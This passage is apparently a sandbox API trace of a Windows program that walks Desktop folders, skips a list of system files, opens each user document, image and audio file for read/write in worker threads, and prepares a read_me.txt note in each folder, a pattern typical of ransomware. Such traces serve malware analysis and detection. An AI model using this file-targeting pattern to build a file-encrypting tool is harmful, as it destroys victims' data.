lpSrch="iconcache.db") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="bootsect.bak") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="boot.ini") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="ntuser.dat.log") returned 0x0 [0074.025] StrStrW (lpFirst="wigem.gif", lpSrch="thumbs.db") returned 0x0 [0074.025] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 26 [0074.025] QueueUserWorkItem (Function=0x404e00, Context=0x7e8, Flags=0x0) returned 1 [0074.025] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfef6bf70, ftCreationTime.dwHighDateTime=0x1d4c728, ftLastAccessTime.dwLowDateTime=0xf11c4070, ftLastAccessTime.dwHighDateTime=0x1d4c762, ftLastWriteTime.dwLowDateTime=0xf11c4070, ftLastWriteTime.dwHighDateTime=0x1d4c762, nFileSizeHigh=0x0, nFileSizeLow=0x3e87, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="yEA9WuGUl0.doc", cAlternateFileName="YEA9WU~1.DOC")) returned 1 [0074.025] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEA9WuGUl0.doc") returned 56 [0074.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEA9WuGUl0.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yea9wugul0.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ec [0074.025] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="read_me.txt") returned 0x0 [0074.025] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="autoexec.bat") returned 0x0 [0074.025] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="desktop.ini") returned 0x0 [0074.025] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="autorun.inf") returned 0x0 [0074.025] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="ntuser.dat") returned 0x0 [0074.025] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="iconcache.db") returned 0x0 [0074.026] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="bootsect.bak") returned 0x0 [0074.026] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="boot.ini") returned 0x0 [0074.026] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="ntuser.dat.log") returned 0x0 [0074.026] StrStrW (lpFirst="yea9wugul0.doc", lpSrch="thumbs.db") returned 0x0 [0074.026] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 27 [0074.026] QueueUserWorkItem (Function=0x404e00, Context=0x7ec, Flags=0x0) returned 1 [0074.026] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16d895f0, ftCreationTime.dwHighDateTime=0x1d4d0e8, ftLastAccessTime.dwLowDateTime=0x47a205d0, ftLastAccessTime.dwHighDateTime=0x1d4c7ac, ftLastWriteTime.dwLowDateTime=0x47a205d0, ftLastWriteTime.dwHighDateTime=0x1d4c7ac, nFileSizeHigh=0x0, nFileSizeLow=0x15a59, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="YQ6ihizfQJQ.bmp", cAlternateFileName="YQ6IHI~1.BMP")) returned 1 [0074.026] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YQ6ihizfQJQ.bmp") returned 57 [0074.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YQ6ihizfQJQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yq6ihizfqjq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="read_me.txt") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="autoexec.bat") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="desktop.ini") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="autorun.inf") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="ntuser.dat") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="iconcache.db") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="bootsect.bak") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="boot.ini") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0074.026] StrStrW (lpFirst="yq6ihizfqjq.bmp", lpSrch="thumbs.db") returned 0x0 [0074.027] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 28 [0074.027] QueueUserWorkItem (Function=0x404e00, Context=0x7f0, Flags=0x0) returned 1 [0074.027] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0902c0, ftCreationTime.dwHighDateTime=0x1d4c75c, ftLastAccessTime.dwLowDateTime=0x6fc3cde0, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x6fc3cde0, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x724e, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="YYjmQ.png", cAlternateFileName="")) returned 1 [0074.027] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YYjmQ.png") returned 51 [0074.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YYjmQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yyjmq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f4 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="read_me.txt") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="autoexec.bat") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="desktop.ini") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="autorun.inf") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="ntuser.dat") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="iconcache.db") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="bootsect.bak") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="boot.ini") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="ntuser.dat.log") returned 0x0 [0074.027] StrStrW (lpFirst="yyjmq.png", lpSrch="thumbs.db") returned 0x0 [0074.027] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 29 [0074.027] QueueUserWorkItem (Function=0x404e00, Context=0x7f4, Flags=0x0) returned 1 [0074.027] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6cea70, ftCreationTime.dwHighDateTime=0x1d4d1b2, ftLastAccessTime.dwLowDateTime=0xb63289d0, ftLastAccessTime.dwHighDateTime=0x1d4c5a8, ftLastWriteTime.dwLowDateTime=0xb63289d0, ftLastWriteTime.dwHighDateTime=0x1d4c5a8, nFileSizeHigh=0x0, nFileSizeLow=0x1a1e, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="Z18u8QGOH13-Iu4LwHT.wav", cAlternateFileName="Z18U8Q~1.WAV")) returned 1 [0074.027] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z18u8QGOH13-Iu4LwHT.wav") returned 65 [0074.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z18u8QGOH13-Iu4LwHT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z18u8qgoh13-iu4lwht.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f8 [0074.028] StrStrW (lpFirst="z18u8qgoh13-iu4lwht.wav", lpSrch="read_me.txt") returned 0x0 [0074.028] StrStrW (lpFirst="z18u8qgoh13-iu4lwht.wav", lpSrch="autoexec.bat") returned 0x0 [0074.028] StrStrW (lpFirst="z18u8qgoh13-iu4lwht.wav", lpSrch="desktop.ini") returned 0x0 [0074.028] QueueUserWorkItem (Function=0x404e00, Context=0x7f8, Flags=0x0) returned 1 [0074.028] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd727040, ftCreationTime.dwHighDateTime=0x1d4d3fc, ftLastAccessTime.dwLowDateTime=0xa84b80d0, ftLastAccessTime.dwHighDateTime=0x1d4d34d, ftLastWriteTime.dwLowDateTime=0xa84b80d0, ftLastWriteTime.dwHighDateTime=0x1d4d34d, nFileSizeHigh=0x0, nFileSizeLow=0x8ac3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="ZeChUGPb.wav", cAlternateFileName="")) returned 1 [0074.028] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZeChUGPb.wav") returned 54 [0074.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZeChUGPb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zechugpb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0074.028] QueueUserWorkItem (Function=0x404e00, Context=0x7fc, Flags=0x0) returned 1 [0074.028] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde9a0d0, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0xfc7f6110, ftLastAccessTime.dwHighDateTime=0x1d4d250, ftLastWriteTime.dwLowDateTime=0xfc7f6110, ftLastWriteTime.dwHighDateTime=0x1d4d250, nFileSizeHigh=0x0, nFileSizeLow=0x8f43, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="_udXp.doc", cAlternateFileName="")) returned 1 [0074.028] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_udXp.doc") returned 51 [0074.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_udXp.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_udxp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x804 [0074.028] QueueUserWorkItem (Function=0x404e00, Context=0x804, Flags=0x0) returned 1 [0074.028] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde9a0d0, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0xfc7f6110, ftLastAccessTime.dwHighDateTime=0x1d4d250, ftLastWriteTime.dwLowDateTime=0xfc7f6110, ftLastWriteTime.dwHighDateTime=0x1d4d250, nFileSizeHigh=0x0, nFileSizeLow=0x8f43, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="_udxp.doc", cAlternateFileName="")) returned 0 [0074.028] FindClose (in: hFindFile=0x2b26f8 | out: hFindFile=0x2b26f8) returned 1 [0074.028] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt") returned 53 [0074.028] GetProcessHeap () returned 0x280000 [0074.028] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0074.028] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 38 [0074.028] GetProcessHeap () returned 0x280000 [0074.028] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b20008 | out: hHeap=0x280000) returned 1 [0074.050] GetProcessHeap () returned 0x280000 [0074.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8be0050 [0074.051] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\*") returned 57 [0074.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7d09340, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x16a4ead0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a4ead0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.051] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\.") returned 57 [0074.052] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7d09340, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x16a4ead0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a4ead0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.052] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\..") returned 58 [0074.052] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f93d3c0, ftCreationTime.dwHighDateTime=0x1d4d562, ftLastAccessTime.dwLowDateTime=0xa0e7cfe0, ftLastAccessTime.dwHighDateTime=0x1d4d309, ftLastWriteTime.dwLowDateTime=0xa0e7cfe0, ftLastWriteTime.dwHighDateTime=0x1d4d309, nFileSizeHigh=0x0, nFileSizeLow=0x10ff, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="2OrJ.png", cAlternateFileName="")) returned 1 [0074.052] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\2OrJ.png") returned 64 [0074.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\2OrJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\2orj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x810 [0074.052] QueueUserWorkItem (Function=0x404e00, Context=0x810, Flags=0x0) returned 1 [0074.052] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc028a60, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0xe21c5ca0, ftLastAccessTime.dwHighDateTime=0x1d4c78e, ftLastWriteTime.dwLowDateTime=0xe21c5ca0, ftLastWriteTime.dwHighDateTime=0x1d4c78e, nFileSizeHigh=0x0, nFileSizeLow=0x17cdb, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="L6g9L.gif", cAlternateFileName="")) returned 1 [0074.052] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\L6g9L.gif") returned 65 [0074.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\L6g9L.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\l6g9l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x814 [0074.052] QueueUserWorkItem (Function=0x404e00, Context=0x814, Flags=0x0) returned 1 [0074.052] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8da28b00, ftCreationTime.dwHighDateTime=0x1d4c620, ftLastAccessTime.dwLowDateTime=0x20a05080, ftLastAccessTime.dwHighDateTime=0x1d4d44b, ftLastWriteTime.dwLowDateTime=0x20a05080, ftLastWriteTime.dwHighDateTime=0x1d4d44b, nFileSizeHigh=0x0, nFileSizeLow=0xda20, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="lBtV.mp3", cAlternateFileName="")) returned 1 [0074.052] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\lBtV.mp3") returned 64 [0074.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\lBtV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\lbtv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x818 [0074.052] QueueUserWorkItem (Function=0x404e00, Context=0x818, Flags=0x0) returned 1 [0074.052] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a89350, ftCreationTime.dwHighDateTime=0x1d4c77b, ftLastAccessTime.dwLowDateTime=0x3b3259b0, ftLastAccessTime.dwHighDateTime=0x1d4c52e, ftLastWriteTime.dwLowDateTime=0x3b3259b0, ftLastWriteTime.dwHighDateTime=0x1d4c52e, nFileSizeHigh=0x0, nFileSizeLow=0x14888, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="LW81G3U7cBxqDv1Xd1fu.odp", cAlternateFileName="LW81G3~1.ODP")) returned 1 [0074.052] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\LW81G3U7cBxqDv1Xd1fu.odp") returned 80 [0074.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\LW81G3U7cBxqDv1Xd1fu.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\lw81g3u7cbxqdv1xd1fu.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x81c [0074.052] QueueUserWorkItem (Function=0x404e00, Context=0x81c, Flags=0x0) returned 1 [0074.053] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4590ca40, ftCreationTime.dwHighDateTime=0x1d4cfc9, ftLastAccessTime.dwLowDateTime=0x822c310, ftLastAccessTime.dwHighDateTime=0x1d4d28b, ftLastWriteTime.dwLowDateTime=0x822c310, ftLastWriteTime.dwHighDateTime=0x1d4d28b, nFileSizeHigh=0x0, nFileSizeLow=0x16de1, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="NevD8gFNlpGC369Gy.xlsx", cAlternateFileName="NEVD8G~1.XLS")) returned 1 [0074.053] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\NevD8gFNlpGC369Gy.xlsx") returned 78 [0074.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\NevD8gFNlpGC369Gy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\nevd8gfnlpgc369gy.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x820 [0074.053] QueueUserWorkItem (Function=0x404e00, Context=0x820, Flags=0x0) returned 1 [0074.053] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a4ead0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a4ead0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a4ead0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.053] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\read_me.txt") returned 67 [0074.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x824 [0074.053] QueueUserWorkItem (Function=0x404e00, Context=0x824, Flags=0x0) returned 1 [0074.053] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1335d0, ftCreationTime.dwHighDateTime=0x1d4c5c3, ftLastAccessTime.dwLowDateTime=0x3ff13ad0, ftLastAccessTime.dwHighDateTime=0x1d4d072, ftLastWriteTime.dwLowDateTime=0x3ff13ad0, ftLastWriteTime.dwHighDateTime=0x1d4d072, nFileSizeHigh=0x0, nFileSizeLow=0x143cc, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="ua2bxdgeas3zzhwmpnmy.mp3", cAlternateFileName="UA2BXD~1.MP3")) returned 0 [0074.053] FindClose (in: hFindFile=0x2b26f8 | out: hFindFile=0x2b26f8) returned 1 [0074.053] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\read_me.txt") returned 67 [0074.053] GetProcessHeap () returned 0x280000 [0074.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8be0050 | out: hHeap=0x280000) returned 1 [0074.053] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 39 [0074.053] GetProcessHeap () returned 0x280000 [0074.053] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40018 | out: hHeap=0x280000) returned 1 [0074.059] GetProcessHeap () returned 0x280000 [0074.059] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8be0050 [0074.059] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\*") returned 59 [0074.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbaa6c10, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.059] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\.") returned 59 [0074.060] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbaa6c10, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.060] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\..") returned 60 [0074.060] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ed70820, ftCreationTime.dwHighDateTime=0x1d4d012, ftLastAccessTime.dwLowDateTime=0x74ac3b00, ftLastAccessTime.dwHighDateTime=0x1d4cdeb, ftLastWriteTime.dwLowDateTime=0x74ac3b00, ftLastWriteTime.dwHighDateTime=0x1d4cdeb, nFileSizeHigh=0x0, nFileSizeLow=0x17bdf, 